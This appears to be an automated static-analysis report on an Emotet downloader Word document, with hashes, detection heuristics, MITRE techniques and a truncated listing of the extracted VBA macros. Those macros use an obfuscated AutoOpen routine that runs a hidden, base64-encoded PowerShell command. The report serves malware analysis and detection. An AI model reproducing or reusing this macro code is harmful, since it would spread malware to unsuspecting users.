Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 cf278006c2b4f444…

MALICIOUS

Office (OLE)

Size: 99.5 KB
Created: 2018-05-27 21:38:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: bfb0d85ce595a33f5a837f56d0cca9af
SHA-1: afbc3ad46bd91469277d42d89faf51cd5bc3abf1
SHA-256: cf278006c2b4f4444d764ea489d43e6af18d296d4e5e3d092962d75bbaff2130
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for Emotet. The AutoOpen macro calls a function that uses Shell() to execute a command. This command appears to be constructing a PowerShell command to download and execute a second-stage payload, indicated by the obfuscated string 'powershell -WindowStyle hidden -e lgAgACgAIAAk'. The ClamAV detection name also explicitly identifies it as an Emotet downloader.

Heuristics (7)

  • ClamAV: Doc.Malware.Emotetdldr-10059129-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotetdldr-10059129-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18134 bytes
SHA-256: e5bbd3b0edab63abad0fb1fbaf5f6c511622c8e3320c1cbc46cd5a4e166e594d

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "sjOwXDSZjUha"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wGTPQWNUj()
On Error Resume Next
jqtFEF = (Qwnmwo * WifMqj - oVTTH * Round(69744)) + (72752 - Rnd(izDdvG) + 37755 + wJolEK)
UwzHBE = (Bqtfs * alwVz - RpiSsj * Round(5643)) + (66915 - Rnd(CCwwdi) + 96881 + KckdX)
wGTPQWNUj = RSirnmn + DRUkSIMw + qpiED + KdszcBd + UDPOb + XXoQTAJMZ + wIflXfj + fmJbLf + cBmQSamZU + iMQwJCjF + GbMtjkz
NkQOzV = (MToUs * mjEbw - Ywovj * Round(28275)) + (80233 - Rnd(RmtMGu) + 88117 + icRDN)
End Function
Sub Autoopen()
On Error Resume Next
qjJdk = (LoFAmI * zYojzJ - tZabOw * Round(13961)) + (33512 - Rnd(bJuHzI) + 10383 + CiLQdj)
YLMvzpzXj (wGTPQWNUj)
awvwwt = (SuUfQJ * PmWuqd - sAzoTD * Round(63384)) + (41281 - Rnd(cQthBQ) + 4654 + UEjrz)
End Sub
Function YLMvzpzXj(OHhzkBH)
On Error Resume Next
TswDnr = (VmCBiz * IdpLwz - PXbhwk * Round(23151)) + (48964 - Rnd(uzsNjv) + 44185 + tdHGd)
jTSGBr = (XuCvD * UVoHd - zICpkP * Round(24029)) + (12040 - Rnd(SSpklj) + 90574 + jdKhY)
IJniB = Shell(TdrMsOMsGZz + Chr(vbKeyP) + bLowGSuj + OHhzkBH, vbHide)
EpRca = (iEWiK * iidhrp - YFbNKS * Round(77935)) + (49544 - Rnd(IiTOb) + 71952 + ATmlEK)
End Function


Attribute VB_Name = "wKaHwQkwl"
Function RSirnmn()
On Error Resume Next
ONzAz = (JuOWs * ihCztu - vwfEK * Round(84864)) + (52813 - Rnd(PzzAh) + 67597 + BmEIQ)
HDsmCRjE = "owers" + "HeLL -W" + "inDowsTyle" + " hidden " + "-e LgAgACgAIAAk"
MHPilO = (KOXCNz * YiIpH - zuwPV * Round(21457)) + (17655 - Rnd(jPukd) + 46510 + rQWZdw)
ZoZqTanb = "AFMAaABlAE" + "wATABpAE" + "QAWwAxAF" + "0AKwA" + "kAFMAaABFA" + "GwAbABpAEQA" + "WwAxADMAXQAr" + "ACcAeAAnACkAK" + "AAoACgA"
Aaznk = (sTdPA * zRLzMa - QiwdR * Round(68160)) + (48448 - Rnd(hSmPiX) + 84722 + VShbwU)
CfnPHwcWiF = "KAAiAHs" + "AMQA1ADEAfQB7A" + "DkANgB9" + "AHsAMQAyADAAfQB" + "7ADEA" + "MAA2AH0AewAxA" + "DAAfQB"
mijjb = (fQJzY * cBzfEK - KArAW * Round(43443)) + (9580 - Rnd(pjiwH) + 90952 + Mwhzw)
TVinpzwGM = "7ADEAMwAz" + "AH0AewA3" + "ADIAfQB7ADYAOQB" + "9AHsA" + "NAAxAH0AewA" + "xADEAMwB9AHs" + "AOAA5AH0A" + "ewAyADcAfQB7ADU"
BBdQG = (PsYndQ * KMuiNM - tqkiA * Round(32615)) + (74758 - Rnd(pzwEM) + 95540 + zOjQj)
SwTNMjQoUBM = "ANgB9AHsAMQAwA" + "DUAfQB7ADgAMgB9" + "AHsAOAA0A" + "H0AewAxADgAfQB" + "7ADEANQA2AH0" + "AewA0ADYAfQ" + "B7ADEAMQA0" + "AH0AewA0ADQAfQ" + "B7ADkAMg"
fQtAif = (FRTTnb * LQwPpC - CZoZD * Round(58618)) + (1929 - Rnd(juzfj) + 27238 + qdRlB)
lcRiUv = "B9AHsANQA" + "wAH0Ae" + "wAxADMAMAB9AHsA" + "OAAxAH0A" + "ewA0ADUAfQB7" + "ADEAMQAyAH0Aew" + "AxADIAMQB9A" + "HsAMQA0ADIAfQB7" + "ADEANAA0A" + "H0AewA2ADEA"
XfiRk = (ziPTb * lcrEbf - ktkYW * Round(13727)) + (91454 - Rnd(laUwD) + 2167 + ftKISL)
zvzmdljp = "fQB7ADUAO" + "QB9AHsAOQ" + "A4AH0AewAzA" + "DcAfQB7ADEANA"
dQaWB = (lilCml * MmGHK - CMIvVX * Round(55916)) + (76473 - Rnd(zuSNph) + 30198 + zAFBi)
pBJJRWN = "AxAH0Ae" + "wA1ADMAfQB7AD" + "gAMwB9A" + "HsAMQA1ADUAf" + "QB7ADkAMQB9AHs" + "AOQAzAH0Aew" + "AxADQAO" + "QB9AHsANA" + "A4AH0AewAxADQ"
oRLSj = (snCwcJ * UUFwYG - krjZwk * Round(93787)) + (35652 - Rnd(HEoXJ) + 38333 + JFtCFK)
IjAfLUp = "AOAB9AHsAMQA0AD" + "MAfQB7AD" + "EAMwAxA" + "H0AewA0ADcA" + "fQB7AD" + "YAMgB9AHsANgA2" + "AH0Ae" + "wAyADQAfQB7A" + "DEANAA2AH0Aew" + "A2ADQ"
Ukjquz = (CjuqSz * mWzoZi - tolhBq * Round(90968)) + (86060 - Rnd(EiawPo) + 30690 + CTQFXt)
maaVRNznDnL = "AfQB7ADcAOQB9AH" + "sANQAyAH0A" + "ewAzADUAfQB7ADg" + "ANQB9AHsAOQA5" + "AH0AewAxAH0Aew" + "AxADUAMwB9AH" + "sAOAB9AHs" + "AMQA0ADU"
RSirnmn = HDsmCRjE + ZoZqTanb + CfnPHwcWiF + TVinpzwGM + SwTNMjQoUBM + lcRiUv + zvzmdljp + pBJJRWN + IjAfLUp + maaVRNznDnL
End Function
Function DRUkSIMw()
On Error Resume Next
qWwXjt = (fjzav * JtIzJB - HswSzG * Round(11234)) + (74830 - Rnd(NpVvE) + 82002 + uYJlrD)
oPwHR = "AfQB7A" + "DcANwB" + "9AHsAM" + "QAyAD" + "kAfQB7ADEAM"
BotVkI = (TwWDY * XiZdoa - SIEAp * Round(35802)) + (29072 - Rnd(Z
... (truncated)